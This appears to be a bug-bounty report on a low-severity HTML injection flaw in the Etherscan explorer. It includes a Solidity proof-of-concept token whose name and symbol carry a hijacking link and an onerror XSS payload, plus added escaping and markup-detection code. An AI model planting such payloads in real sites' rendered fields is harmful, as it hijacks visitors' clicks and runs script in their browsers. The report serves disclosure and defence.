
Vulnerability details

Audit status: Audit Passed (2018-09-19 17:12:16)

Claim status: Has been claimed (2018-09-20 11:19:09)

Vulnerability status: Has been claimed

Congratulations! The vulnerability you submitted has been claimed by the vendor

The vendor confirms the vulnerability information as follows:

Level: Low

Reward: 0.5 Ether

Vulnerability Information

Serial Number: DVP-2018-11357
Title: Click Hijacking
Target Type: Web flaw
Attack Type: Injection class vulnerability
Level: Low
Reward: 0.5 Ether
Company: Etherscan
Nickname: LoRexxar233
Vulnerability Description:

Vulnerability URL (fill in for web targets):

 https://etherscan.io

Brief description (vulnerability details, exploitation conditions, impact):

 When deploying a token contract that conforms to the ERC20 standard, the symbol and name are user-defined, so an <a> tag can be embedded in them that overrides the page's original tag.

 When a user visits the page and clicks the contract name, they can be hijacked to an arbitrary website.

 This requires deploying an ERC20-standard contract and issuing one transaction before the contract page is visited.

Proof of vulnerability:

 https://ropsten.etherscan.io/address/0x701300f2f2c171c8c7c09e0fa09d6706a4fc7cd6#tokentxns

Exploit code:

pragma solidity ^0.4.24;

// Proof-of-concept token from the report: the ERC20 name and symbol carry HTML,
// which the explorer rendered unescaped. The contract only needs to emit Transfer
// events for the explorer to index it as a token.
contract MyTest {
    mapping(address => uint256) balances;
    uint256 public totalSupply;
    mapping (address => mapping (address => uint256)) allowance;
    address public owner;
    string public name;
    string public symbol;
    uint8 public decimals = 18;

    event Transfer(address indexed _from, address indexed _to, uint256 _value);

    constructor() public {
        // Markup placed in the token metadata (the injection payload of the report)
        name = "<a href=http://baidu.com>12321</a>";
        symbol = 'ok<img src=/ onerror=alert(1)> ';
        totalSupply = 100000000000000000000000000000000000;
    }

    // Emits a Transfer event so that the explorer lists the contract as a token
    function mylog(address arg0, address arg1, uint256 arg2) public {
        emit Transfer(arg0, arg1, arg2);
    }
}

Fix recommendation:

Filter the name and symbol.
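As an added example (not Etherscan's code and not the reporter's), the rendering-side fix: escape the contract-supplied name and symbol on output, with the vulnerable interpolation shown beside the escaped one, plus a check that flags metadata containing markup. The token values are constructed from the report's proof-of-concept contract; the function names are assumptions.

```javascript
// Added example: render ERC20 name/symbol as text, never as HTML.
const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Replace every HTML-significant character with its entity.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Token metadata as an explorer would read it from the contract
// (constructed sample, copied from the report's proof-of-concept values).
const token = {
  name: '<a href=http://baidu.com>12321</a>',
  symbol: 'ok<img src=/ onerror=alert(1)> ',
};

// Vulnerable pattern: contract-controlled strings interpolated straight into markup,
// so the <a> tag in the name becomes a live link and the <img> fires its handler.
function renderTokenUnsafe(t) {
  return `<span class="token">${t.name} (${t.symbol})</span>`;
}

// Fixed pattern: escape on output so the browser shows the metadata as literal text.
// (In DOM code the equivalent is assigning to textContent rather than innerHTML.)
function renderTokenSafe(t) {
  return `<span class="token">${escapeHtml(t.name)} (${escapeHtml(t.symbol.trim())})</span>`;
}

// Defensive check: flag on-chain metadata that contains a tag or an on*= handler
// attribute, so it can be logged or reviewed before being displayed.
function looksLikeMarkup(s) {
  return /<\s*\/?\s*[a-z][^>]*>/i.test(s) || /\bon[a-z]+\s*=/i.test(s);
}
```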

————————————————————————————————

After contacting the vendor Etherscan, the vulnerability has now been fixed.
